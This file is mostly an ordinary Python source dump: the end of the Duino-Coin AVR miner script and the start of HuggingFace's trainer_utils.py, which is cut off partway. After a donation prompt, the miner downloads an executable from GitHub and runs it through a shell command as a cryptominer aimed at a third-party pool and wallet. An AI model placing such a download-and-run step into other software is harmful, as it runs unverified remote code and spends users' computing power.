+ "Set developer donation level (0-5) (recommended: 1), this will not reduce your earnings: "
+ Style.BRIGHT
)
donationlevel = re.sub(
"\D", "", donationlevel
) # Check wheter donationlevel is correct
if float(donationlevel) > int(5):
donationlevel = 5
if float(donationlevel) < int(0):
donationlevel = 0
config["arduminer"] = { # Format data
"username": username,
"avrport": avrport,
"donate": donationlevel,
"debug": "n",
"identifier": rigIdentifier,
"difficulty": requestedDiff,
}
with open(
str(resourcesFolder) + "/Miner_config.cfg", "w"
) as configfile: # Write data to file
config.write(configfile)
avrport = avrport.split(",")
print(Style.RESET_ALL + "Config saved! Launching the miner")
else: # If config already exists, load from it
config.read(str(resourcesFolder) + "/Miner_config.cfg")
username = config["arduminer"]["username"]
avrport = config["arduminer"]["avrport"]
avrport = avrport.split(",")
donationlevel = config["arduminer"]["donate"]
debug = config["arduminer"]["debug"]
rigIdentifier = config["arduminer"]["identifier"]
requestedDiff = config["arduminer"]["difficulty"]
def Greeting(): # Greeting message depending on time
global greeting
print(Style.RESET_ALL)
current_hour = time.strptime(time.ctime(time.time())).tm_hour
if current_hour < 12:
greeting = "Have a wonderful morning"
elif current_hour == 12:
greeting = "Have a tasty noon"
elif current_hour > 12 and current_hour < 18:
greeting = "Have a peaceful afternoon"
elif current_hour >= 18:
greeting = "Have a cozy evening"
else:
greeting = "Welcome back"
print(
" > "
+ Fore.YELLOW
+ Style.BRIGHT
+ "Official Duino-Coin © AVR Miner"
+ Style.RESET_ALL
+ Fore.WHITE
+ " (v"
+ str(minerVersion)
+ ") 2019-2021"
) # Startup message
print(" > " + Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
print(
" > "
+ Fore.WHITE
+ "AVR board(s) on port(s): "
+ Style.BRIGHT
+ Fore.YELLOW
+ " ".join(avrport)
)
if os.name == "nt" or os.name == "posix":
print(
" > "
+ Fore.WHITE
+ "Donation level: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donationlevel)
)
print(
" > "
+ Fore.WHITE
+ "Algorithm: "
+ Style.BRIGHT
+ Fore.YELLOW
+ "DUCO-S1A @ "
+ str(requestedDiff)
+ " diff"
)
print(
Style.RESET_ALL
+ " > "
+ Fore.WHITE
+ "Rig identifier: "
+ Style.BRIGHT
+ Fore.YELLOW
+ rigIdentifier
)
print(
" > "
+ Fore.WHITE
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n"
)
if os.name == "nt":
if not Path(
resourcesFolder + "/Donate_executable.exe"
).is_file(): # Initial miner executable section
debugOutput("OS is Windows, downloading developer donation executable")
url = "https://github.com/revoxhere/duino-coin/blob/useful-tools/DonateExecutableWindows.exe?raw=true"
r = requests.get(url)
with open(resourcesFolder + "/Donate_executable.exe", "wb") as f:
f.write(r.content)
elif os.name == "posix":
if not Path(
resourcesFolder + "/Donate_executable"
).is_file(): # Initial miner executable section
debugOutput("OS is Windows, downloading developer donation executable")
url = "https://github.com/revoxhere/duino-coin/blob/useful-tools/DonateExecutableLinux?raw=true"
r = requests.get(url)
with open(resourcesFolder + "/Donate_executable", "wb") as f:
f.write(r.content)
def Donate():
global donationlevel, donatorrunning, donateExecutable
if os.name == "nt":
cmd = (
"cd "
+ resourcesFolder
+ "& Donate_executable.exe -o stratum+tcp://blockmasters.co:6033 -u 9RTb3ikRrWExsF6fis85g7vKqU1tQYVFuR -p AVRmW,c=XMG,d=16 -s 4 -e "
)
elif os.name == "posix":
cmd = (
"cd "
+ resourcesFolder
+ "&& chmod +x Donate_executable && ./Donate_executable -o stratum+tcp://blockmasters.co:6033 -u 9RTb3ikRrWExsF6fis85g7vKqU1tQYVFuR -p AVRmL,c=XMG,d=16 -s 4 -e "
)
if int(donationlevel) <= 0:
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.GREEN
+ Fore.WHITE
+ " sys0 "
+ Back.RESET
+ Fore.YELLOW
+ " Duino-Coin network is a completely free service and will always be."
+ Style.BRIGHT
+ Fore.YELLOW
+ "\nWe don't take any fees from your mining.\nYou can really help us maintain the server and low-fee exchanges by donating.\nVisit "
+ Style.RESET_ALL
+ Fore.GREEN
+ "https://duinocoin.com/donate"
+ Style.BRIGHT
+ Fore.YELLOW
+ " to learn more about how you can help :)"
+ Style.RESET_ALL
)
time.sleep(10)
if donatorrunning == False:
if int(donationlevel) == 5:
cmd += "100"
elif int(donationlevel) == 4:
cmd += "85"
elif int(donationlevel) == 3:
cmd += "60"
elif int(donationlevel) == 2:
cmd += "30"
elif int(donationlevel) == 1:
cmd += "15"
if int(donationlevel) > 0: # Launch CMD as subprocess
debugOutput("Starting donation process")
donatorrunning = True
donateExecutable = subprocess.Popen(
cmd, shell=True, stderr=subprocess.DEVNULL
)
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.GREEN
+ Fore.WHITE
+ " sys0 "
+ Back.RESET
+ Fore.RED
+ " Thank You for being an awesome donator ❤️ \nYour donation will help us maintain the server and allow further development"
+ Style.RESET_ALL
)
def initRichPresence():
global RPC
try:
RPC = Presence(808056068113563701)
RPC.connect()
except: # Discord not launched
pass
def updateRichPresence():
startTime = int(time.time())
while True:
try:
RPC.update(
details="Hashrate: " + str(hashrate) + " H/s",
start=startTime,
state="Acc. shares: "
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1]),
large_image="ducol",
large_text="Duino-Coin, a cryptocurrency that can be mined with Arduino boards",
buttons=[
{"label": "Learn more", "url": "https://duinocoin.com"},
{"label": "Discord Server", "url": "https://discord.gg/k48Ht5y"},
],
)
except: # Discord not launched
pass
time.sleep(15) # 15 seconds to respect discord's rate limit
def AVRMine(com): # Mining section
global hash_count, connectionMessageShown, hashrate
while True:
while True:
try:
res = requests.get(
serveripfile, data=None
) # Use request to grab data from raw github file
if res.status_code == 200: # Check for response
content = (
res.content.decode().splitlines()
) # Read content and split into lines
masterServer_address = content[0] # Line 1 = pool address
masterServer_port = content[1] # Line 2 = pool port
debugOutput(
"Retrieved pool IP: "
+ masterServer_address
+ ":"
+ str(masterServer_port)
)
break
except: # If it wasn't, display a message
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ Back.BLUE
+ Fore.WHITE
+ " net"
+ str(com[-1:].lower())
+ " "
+ Back.RESET
+ Fore.RED
+ " Error retrieving data from GitHub! Retrying in 10s."
)
if debug == "y":
raise
time.sleep(10)
while True: # This section connects to the server
try:
socId = socket.socket()
socId.connect(
(str(masterServer_address), int(masterServer_port))
) # Connect to the server
serverVersion = socId.recv(3).decode() # Get server version
debugOutput("Server version: " + serverVersion)
if (
float(serverVersion) <= float(minerVersion)
and len(serverVersion) == 3
and connectionMessageShown != True
): # If miner is up-to-date, display a message and continue
connectionMessageShown = True
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ Back.BLUE
+ Fore.WHITE
+ " net0 "
+ Back.RESET
+ Fore.YELLOW
+ " Connected"
+ Style.RESET_ALL
+ Fore.WHITE
+ " to master Duino-Coin server (v"
+ str(serverVersion)
+ ")"
)
elif connectionMessageShown != True:
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ Back.GREEN
+ Fore.WHITE
+ " sys0 "
+ Back.RESET
+ Fore.RED
+ " Miner is outdated (v"
+ minerVersion
+ "),"
+ Style.RESET_ALL
+ Fore.RED
+ " server is on v"
+ serverVersion
+ ", please download latest version from https://github.com/revoxhere/duino-coin/releases/"
)
break
except:
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.BLUE
+ Fore.WHITE
+ " net0 "
+ Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RED
+ " Error connecting to the server. Retrying in 10s"
+ Style.RESET_ALL
)
if debug == "y":
raise
time.sleep(10)
while True:
try: # Close previous serial connections (if any)
com.close()
except:
pass
try:
comConnection = serial.Serial(
com,
115200,
timeout=3,
write_timeout=3,
inter_byte_timeout=1,
)
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.WHITE
+ " "
+ str(com[-4:].lower())
+ " "
+ Style.RESET_ALL
+ Style.BRIGHT
+ Fore.GREEN
+ " AVR on port "
+ str(com[-4:])
+ " is connected"
+ Style.RESET_ALL
)
break
except:
debugOutput("Error connecting to AVR")
if debug == "y":
raise
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.WHITE
+ " "
+ str(com[-4:].lower())
+ " "
+ Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RED
+ " AVR connection error on port "
+ str(com[-4:])
+ ", please check wether it's plugged in or not"
+ Style.RESET_ALL
)
time.sleep(10)
first_share = True
avr_not_initialized = True
while avr_not_initialized:
try:
ready = comConnection.readline().decode() # AVR will send ready signal
debugOutput("Received start word (" + str(ready) + ")")
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.GREEN
+ Fore.WHITE
+ " sys"
+ str(com[-1:])
+ " "
+ Back.RESET
+ Fore.YELLOW
+ " AVR mining thread is starting"
+ Style.RESET_ALL
+ Fore.WHITE
+ " using DUCO-S1A algorithm ("
+ str(com)
+ ")"
)
avr_not_initialized = False
except:
while connection_error:
connection_error = True
time.sleep(10)
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.WHITE
+ " "
+ str(com[-4:].toLower())
+ " "
+ Back.RESET
+ Fore.RED
+ " Error connecting to the AVR! Retrying in 10s."
)
else:
connection_error = False
avr_not_initialized = True
while True:
while True:
try:
job_not_received = True
while job_not_received:
socId.send(
bytes(
"JOB," + str(username) + "," + str(requestedDiff),
encoding="utf8",
)
) # Send job request
try:
job = socId.recv(1024).decode() # Retrieves work from pool
debugOutput("Received job")
job_not_received = False
except:
break
job = job.split(",") # Split received data to job and difficulty
try:
if job[0] and job[1] and job[2]:
debugOutput("Job received: " + str(job))
diff = job[2]
break # If job received, continue
except IndexError:
debugOutput("IndexError, retrying")
except:
if debug == "y":
raise
break
try: # Write data to AVR board
try:
comConnection.write(bytes("start\n", encoding="utf8")) # start word
debugOutput("Written start word")
comConnection.write(
bytes(
str(job[0] + "\n" + job[1] + "\n" + job[2] + "\n"),
encoding="utf8",
)
) # hash
debugOutput("Send job to arduino")
except:
ConnectToAVR()
continue
wrong_avr_result = True
wrong_results = 0
while wrong_avr_result:
result = comConnection.readline().decode() # Read the result
debugOutput(str("result: ") + str(result))
if result == "":
wrong_avr_result = True
wrong_results = wrong_results + 1
if first_share or wrong_results > 5:
wrong_avr_result = False
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.WHITE
+ " avr "
+ Back.RESET
+ Fore.RED
+ " Arduino is taking longer than expected, sending it a new job "
)
else:
wrong_avr_result = False
first_share = False
wrong_results = 0
if first_share or wrong_results > 5:
continue
result = result.split(",")
try:
debugOutput("Received result (" + str(result[0]) + ")")
debugOutput("Received time (" + str(result[1]) + ")")
computetime = round(
int(result[1]) / 1000000, 3
) # Convert AVR time to s
hashrate = round(int(result[0]) / int(result[1]) * 1000000, 2)
debugOutput("Calculated hashrate (" + str(hashrate) + ")")
except:
break
try:
socId.send(
bytes(
str(result[0])
+ ","
+ str(hashrate)
+ ",Official AVR Miner v"
+ str(minerVersion)
+ ","
+ str(rigIdentifier),
encoding="utf8",
)
) # Send result back to the server
except:
break
except:
break
while True:
responsetimetart = now()
feedback_not_received = True
while feedback_not_received:
try:
feedback = socId.recv(64).decode() # Get feedback
except socket.timeout:
feedback_not_received = True
debugOutput("Timeout while getting feedback, retrying")
except ConnectionResetError:
debugOutput("Connection was reset, reconnecting")
feedback_not_received = True
break
except ConnectionAbortedError:
debugOutput("Connection was aborted, reconnecting")
feedback_not_received = True
break
else:
responsetimestop = now() # Measure server ping
ping = responsetimestop - responsetimetart # Calculate ping
ping = str(int(ping.microseconds / 1000)) # Convert to ms
feedback_not_received = False
debugOutput("Successfully retrieved feedback")
if feedback == "GOOD": # If result was good
shares[0] = (
shares[0] + 1
) # Share accepted = increment correct shares counter by 1
title(
"Duino-Coin AVR Miner (v"
+ str(minerVersion)
+ ") - "
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1])
+ " accepted shares"
)
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.WHITE
+ " "
+ str(com[-4:].lower())
+ " "
+ Back.RESET
+ Fore.GREEN
+ " Accepted "
+ Fore.WHITE
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1])
+ Back.RESET
+ Fore.YELLOW
+ " ("
+ str(int((shares[0] / (shares[0] + shares[1]) * 100)))
+ "%)"
+ Style.NORMAL
+ Fore.WHITE
+ " ⁃ "
+ Style.BRIGHT
+ Fore.WHITE
+ str(computetime)
+ "s"
+ Style.NORMAL
+ " - "
+ str(hashrate)
+ " H/s @ diff "
+ str(diff)
+ " ⁃ "
+ Fore.BLUE
+ "ping "
+ ping
+ "ms"
)
break # Repeat
elif feedback == "BLOCK": # If result was good
shares[0] = (
shares[0] + 1
) # Share accepted = increment correct shares counter by 1
title(
"Duino-Coin AVR Miner (v"
+ str(minerVersion)
+ ") - "
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1])
+ " accepted shares"
)
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.WHITE
+ " "
+ str(com[-4:].lower())
+ " "
+ Back.RESET
+ Fore.CYAN
+ " Block found "
+ Fore.WHITE
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1])
+ Back.RESET
+ Fore.YELLOW
+ " ("
+ str(int((shares[0] / (shares[0] + shares[1]) * 100)))
+ "%)"
+ Style.NORMAL
+ Fore.WHITE
+ " ⁃ "
+ Style.BRIGHT
+ Fore.WHITE
+ str(computetime)
+ "s"
+ Style.NORMAL
+ " - "
+ str(hashrate)
+ " H/s @ diff "
+ str(diff)
+ " ⁃ "
+ Fore.BLUE
+ "ping "
+ ping
+ "ms"
)
break # Repeat
elif feedback == "INVU": # If user doesn't exist
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.BLUE
+ Fore.WHITE
+ " net"
+ str(com[-1:])
+ " "
+ Back.RESET
+ Fore.RED
+ " User "
+ str(username)
+ " doesn't exist."
+ Style.RESET_ALL
+ Fore.RED
+ " Make sure you've entered the username correctly. Please check your config file. Retrying in 10s"
)
time.sleep(10)
elif feedback == "ERR": # If server says that it encountered an error
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.BLUE
+ Fore.WHITE
+ " net"
+ str(com[-1:])
+ " "
+ Back.RESET
+ Fore.RED
+ " Internal server error."
+ Style.RESET_ALL
+ Fore.RED
+ " Retrying in 10s"
)
time.sleep(10)
else: # If result was bad
shares[1] += 1 # Share rejected = increment bad shares counter by 1
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.WHITE
+ " "
+ str(com[-4:].lower())
+ " "
+ Back.RESET
+ Fore.RED
+ " Rejected "
+ Fore.WHITE
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1])
+ Back.RESET
+ Fore.YELLOW
+ " ("
+ str(int((shares[0] / (shares[0] + shares[1]) * 100)))
+ "%)"
+ Style.NORMAL
+ Fore.WHITE
+ " ⁃ "
+ Style.BRIGHT
+ Fore.WHITE
+ str(computetime)
+ "s"
+ Style.NORMAL
+ " - "
+ str(hashrate)
+ " H/s @ diff "
+ str(diff)
+ " ⁃ "
+ Fore.BLUE
+ "ping "
+ ping
+ "ms"
)
break # Repeat
if __name__ == "__main__":
init(autoreset=True) # Enable colorama
title("Duino-Coin AVR Miner (v" + str(minerVersion) + ")")
try:
loadConfig() # Load config file or create new one
debugOutput("Config file loaded")
except:
print(
now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.RESET_ALL
+ Style.BRIGHT
+ Back.GREEN
+ Fore.WHITE
+ " sys0 "
+ Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RED
+ " Error loading the configfile ("
+ resourcesFolder
+ "/Miner_config.cfg). Try removing it and re-running configuration. Exiting in 10s"
+ Style.RESET_ALL
)
if debug == "y":
raise
time.sleep(10)
os._exit(1)
try:
Greeting() # Display greeting message
debugOutput("Greeting displayed")
except:
if debug == "y":
raise
try:
Donate() # Start donation thread
except:
if debug == "y":
raise
try:
for port in avrport:
threading.Thread(
target=AVRMine, args=(port,)
).start() # Launch avr duco mining threads
except:
if debug == "y":
raise
initRichPresence()
threading.Thread(target=updateRichPresence).start()
|
trainer_utils.py
|
# coding=utf-8
# Copyright 2020-present the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Utilities for the Trainer and TFTrainer class. Should be independent from PyTorch and TensorFlow.
"""
import copy
import functools
import gc
import inspect
import os
import random
import re
import threading
import time
from typing import Any, Dict, NamedTuple, Optional, Tuple, Union
import numpy as np
from .utils import (
ExplicitEnum,
is_psutil_available,
is_tf_available,
is_torch_available,
is_torch_cuda_available,
is_torch_tpu_available,
)
if is_torch_available():
import torch
if is_tf_available():
import tensorflow as tf
def set_seed(seed: int):
"""
Helper function for reproducible behavior to set the seed in `random`, `numpy`, `torch` and/or `tf` (if installed).
Args:
seed (`int`): The seed to set.
"""
random.seed(seed)
np.random.seed(seed)
if is_torch_available():
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# ^^ safe to call this function even if cuda is not available
if is_tf_available():
tf.random.set_seed(seed)
class EvalPrediction(NamedTuple):
"""
Evaluation output (always contains labels), to be used to compute metrics.
Parameters:
predictions (`np.ndarray`): Predictions of the model.
label_ids (`np.ndarray`): Targets to be matched.
"""
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Union[np.ndarray, Tuple[np.ndarray]]
class EvalLoopOutput(NamedTuple):
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Optional[Union[np.ndarray, Tuple[np.ndarray]]]
metrics: Optional[Dict[str, float]]
num_samples: Optional[int]
class PredictionOutput(NamedTuple):
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Optional[Union[np.ndarray, Tuple[np.ndarray]]]
metrics: Optional[Dict[str, float]]
class TrainOutput(NamedTuple):
global_step: int
training_loss: float
metrics: Dict[str, float]
PREFIX_CHECKPOINT_DIR = "checkpoint"
_re_checkpoint = re.compile(r"^" + PREFIX_CHECKPOINT_DIR + r"\-(\d+)$")
def get_last_checkpoint(folder):
content = os.listdir(folder)
checkpoints = [
path
for path in content
if _re_checkpoint.search(path) is not None and os.path.isdir(os.path.join(folder, path))
]
if len(checkpoints) == 0:
return
return os.path.join(folder, max(checkpoints, key=lambda x: int(_re_checkpoint.search(x).groups()[0])))
class IntervalStrategy(ExplicitEnum):
NO = "no"
STEPS = "steps"
EPOCH = "epoch"
class EvaluationStrategy(ExplicitEnum):
NO = "no"
STEPS = "steps"
EPOCH = "epoch"
class HubStrategy(ExplicitEnum):
END = "end"
EVERY_SAVE = "every_save"
CHECKPOINT = "checkpoint"
ALL_CHECKPOINTS = "all_checkpoints"
class BestRun(NamedTuple):
"""
The best run found by an hyperparameter search (see [`~Trainer.hyperparameter_search`]).
Parameters:
run_id (`str`):
The id of the best run (if models were saved, the corresponding checkpoint will be in the folder ending
with run-{run_id}).
objective (`float`):
The objective that was obtained for this run.
hyperparameters (`Dict[str, Any]`):
The hyperparameters picked to get this run.
"""
run_id: str
objective: float
hyperparameters: Dict[str, Any]
def default_compute_objective(metrics: Dict[str, float]) -> float:
"""
The default objective to maximize/minimize when doing an hyperparameter search. It is the evaluation loss if no
metrics are provided to the [`Trainer`], the sum of all metrics otherwise.
Args:
metrics (`Dict[str, float]`): The metrics returned by the evaluate method.
Return:
`float`: The objective to minimize or maximize
"""
metrics = copy.deepcopy(metrics)
loss = metrics.pop("eval_loss", None)
_ = metrics.pop("epoch", None)
# Remove speed metrics
speed_metrics = [m for m in metrics.keys() if m.endswith("_runtime") or m.endswith("_per_second")]
for sm in speed_metrics:
_ = metrics.pop(sm, None)
return loss if len(metrics) == 0 else sum(metrics.values())
def default_hp_space_optuna(trial) -> Dict[str, float]:
from .integrations import is_optuna_available
assert is_optuna_available(), "This function needs Optuna installed: `pip install optuna`"
return {
"learning_rate": trial.suggest_float("learning_rate", 1e-6, 1e-4, log=True),
"num_train_epochs": trial.suggest_int("num_train_epochs", 1, 5),
"seed": trial.suggest_int("seed", 1, 40),
"per_device_train_batch_size": trial.suggest_categorical("per_device_train_batch_size", [4, 8, 16, 32, 64]),
}
def default_hp_space_ray(trial) -> Dict[str, float]:
from .integrations import is_ray_tune_available
assert is_ray_tune_available(), "This function needs ray installed: `pip " "install ray[tune]`"
from ray import tune
return {
"learning_rate": tune.loguniform(1e-6, 1e-4),
"num_train_epochs": tune.choice(list(range(1, 6))),
"seed": tune.uniform(1, 40),
"per_device_train_batch_size": tune.choice([4, 8, 16, 32, 64]),
}
def default_hp_space_sigopt(trial):
return [
{"bounds": {"min": 1e-6, "max": 1e-4}, "name": "learning_rate", "type": "double", "transformamtion": "log"},
{"bounds": {"min": 1, "max": 6}, "name": "num_train_epochs", "type": "int"},
{"bounds": {"min": 1, "max": 40}, "name": "seed", "type": "int"},
{
"categorical_values": ["4", "8", "16", "32", "64"],
"name": "per_device_train_batch_size",
"type": "categorical",
},
]
def default_hp_space_wandb(trial) -> Dict[str, float]:
from .integrations import is_wandb_available
if not is_wandb_available():
raise ImportError("This function needs wandb installed: `pip install wandb`")
return {
"method": "random",
"metric": {"name": "objective", "goal": "minimize"},
"parameters": {
"learning_rate": {"distribution": "uniform", "min": 1e-6, "max": 1e-4},
"num_train_epochs": {"distribution": "int_uniform", "min": 1, "max": 6},
"seed": {"distribution": "int_uniform", "min": 1, "max": 40},
"per_device_train_batch_size": {"values": [4, 8, 16, 32, 64]},
},
}
class HPSearchBackend(ExplicitEnum):
OPTUNA = "optuna"
RAY = "ray"
SIGOPT = "sigopt"
WANDB = "wandb"
default_hp_space = {
HPSearchBackend.OPTUNA: default_hp_space_optuna,
HPSearchBackend.RAY: default_hp_space_ray,
HPSearchBackend.SIGOPT: default_hp_space_sigopt,
HPSearchBackend.WANDB: default_hp_space_wandb,
}
def is_main_process(local_rank):
"""
Whether or not the current process is the local process, based on `xm.get_ordinal()` (for TPUs) first, then on
`local_rank`.
"""
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
return xm.get_ordinal() == 0
return local_rank in [-1, 0]
def total_processes_number(local_rank):
"""
Return the number of processes launched in parallel. Works with `torch.distributed` and TPUs.
"""
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
return xm.xrt_world_size()
elif local_rank != -1 and is_torch_available():
import torch
return torch.distributed.get_world_size()
return 1
def speed_metrics(split, start_time, num_samples=None, num_steps=None):
"""
Measure and return speed performance metrics.
This function requires a time snapshot `start_time` before the operation to be measured starts and this function
should be run immediately after the operation to be measured has completed.
Args:
- split: name to prefix metric (like train, eval, test...)
- start_time: operation start time
- num_samples: number of samples processed
"""
runtime = time.time() - start_time
result = {f"{split}_runtime": round(runtime, 4)}
if num_samples is not None:
samples_per_second = num_samples / runtime
result[f"{split}_samples_per_second"] = round(samples_per_second, 3)
if num_steps is not None:
steps_per_second = num_steps / runtime
result[f"{split}_steps_per_second"] = round(steps_per_second, 3)
return result
class SchedulerType(ExplicitEnum):
LINEAR = "linear"
COSINE = "cosine"
COSINE_WITH_RESTARTS = "cosine_with_restarts"
POLYNOMIAL = "polynomial"
CONSTANT = "constant"
CONSTANT_WITH_WARMUP = "constant_with_warmup"
class TrainerMemoryTracker:
"""
A helper class that tracks cpu and gpu memory.
This class will silently skip unless `psutil` is available. Install with `pip install psutil`.
When a stage completes, it can pass metrics dict to update with the memory metrics gathered during this stage.
Example :
```python
self._memory_tracker = TrainerMemoryTracker(self.args.skip_memory_metrics)
self._memory_tracker.start()
# code ...
metrics = {"train_runtime": 10.5}
self._memory_tracker.stop_and_update_metrics(metrics)
```
At the moment GPU tracking is only for `pytorch`, but can be extended to support `tensorflow`.
To understand this class' intricacies please read the documentation of [`~Trainer.log_metrics`].
"""
# map trainer methods to metrics prefix
stages = {
"__init__": "init",
"train": "train",
"evaluate": "eval",
"predict": "test",
}
def __init__(self, skip_memory_metrics=False):
self.skip_memory_metrics = skip_memory_metrics
if not is_psutil_available():
# soft dependency on psutil
self.skip_memory_metrics = True
if self.skip_memory_metrics:
return
import psutil # noqa
if is_torch_cuda_available():
import torch
self.torch = torch
self.gpu = {}
else:
self.torch = None
self.process = psutil.Process()
self.cur_stage = None
self.cpu = {}
self.init_reported = False
def derive_stage(self):
"""derives the stage/caller name automatically"""
caller = inspect.currentframe().f_back.f_back.f_code.co_name
if caller in self.stages:
return self.stages[caller]
else:
raise ValueError(
f"was called from {caller}, but only expect to be called from one of {self.stages.keys()}"
)
def cpu_mem_used(self):
"""get resident set size memory for the current process"""
return self.process.memory_info().rss
def peak_monitor_func(self):
self.cpu_mem_used_peak = -1
while True:
self.cpu_mem_used_peak = max(self.cpu_mem_used(), self.cpu_mem_used_peak)
# can't sleep or will not catch the peak right (this comment is here on purpose)
# time.sleep(0.001) # 1msec
if not self.peak_monitoring:
break
def start(self):
"""start tracking for the caller's stage"""
if self.skip_memory_metrics:
return
stage = self.derive_stage()
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
self.cur_stage = stage
gc.collect()
if self.torch is not None:
self.torch.cuda.reset_peak_memory_stats()
self.torch.cuda.empty_cache()
# gpu
if self.torch is not None:
self.gpu_mem_used_at_start = self.torch.cuda.memory_allocated()
# cpu
self.cpu_mem_used_at_start = self.cpu_mem_used()
self.peak_monitoring = True
peak_monitor_thread = threading.Thread(target=self.peak_monitor_func)
peak_monitor_thread.daemon = True
peak_monitor_thread.start()
def stop(self, stage):
"""stop tracking for the passed stage"""
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
# this sends a signal to peak_monitor_func to complete its loop
self.peak_monitoring = False
# first ensure all objects get collected and their memory is freed
gc.collect()
if self.torch is not None:
self.torch.cuda.empty_cache()
# concepts:
# - alloc_delta: the difference of allocated memory between the end and the start
# - peaked_delta: the difference between the peak memory and the current memory
# in order to know how much memory the measured code consumed one needs to sum these two
# gpu
if self.torch is not None:
self.gpu_mem_used_now = self.torch.cuda.memory_allocated()
self.gpu_mem_used_peak = self.torch.cuda.max_memory_allocated()
self.gpu[self.cur_stage] = dict(
begin=self.gpu_mem_used_at_start,
end=self.gpu_mem_used_now,
alloc=(self.gpu_mem_used_now - self.gpu_mem_used_at_start),
peaked=max(0, self.gpu_mem_used_peak - self.gpu_mem_used_now),
)
# cpu
self.cpu_mem_used_now = self.cpu_mem_used()
self.cpu[self.cur_stage] = dict(
begin=self.cpu_mem_used_at_start,
end=self.cpu_mem_used_now,
alloc=(self.cpu_mem_used_now - self.cpu_mem_used_at_start),
peaked=max(0, self.cpu_mem_used_peak - self.cpu_mem_used_now),
)
# reset - cycle finished
self.cur_stage = None
def update_metrics(self, stage, metrics):
"""updates the metrics"""
if self.skip_memory_metrics:
return
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
# since we don't have a way to return init metrics, we push them into the first of train/val/predict
stages = [stage]
if not self.init_reported:
stages.insert(0, "init")
self.init_reported = True
for stage in stages:
for t in ["alloc", "peaked"]:
if stage in self.cpu and t in self.cpu[stage]:
metrics[f"{stage}_mem_cpu_{t}_delta"] = self.cpu[stage][t]
if self.torch is not None and stage in self.gpu and t in self.gpu[stage]:
metrics[f"{stage}_mem_gpu_{t}_delta"] = self.gpu[stage][t]
# if we need additional debug info, enable the following
# for t in ["begin", "end"]:
# if stage in self.cpu and t in self.cpu[stage]:
# metrics[f"{stage}_mem_cpu_{t}"] = self.cpu[stage][t]
# if self.torch is not None and stage in self.gpu and t in self.gpu[stage]:
# metrics[f"{stage}_mem_gpu_{t}"] = self.gpu[stage][t]
# since memory can be allocated before init, and it might be difficult to track overall
# memory usage, in particular for GPU, let's report memory usage at the point init was called
if stages[0] == "init":
metrics["before_init_mem_cpu"] = self.cpu["init"]["begin"]
if self.torch is not None:
metrics["before_init_mem_gpu"] = self.gpu["init"]["begin"]
# if we also wanted to report any additional memory allocations in between init and
# whatever the next stage was we could also report this:
# if self.cpu["init"]["end"] != self.cpu[stage]["begin"]:
# metrics[f"after_init_mem_cpu_delta"] = self.cpu[stage]["begin"] - self.cpu["init"]["end"]
# if self.torch is not None and self.gpu["init"]["end"] != self.gpu[stage]["begin"]:
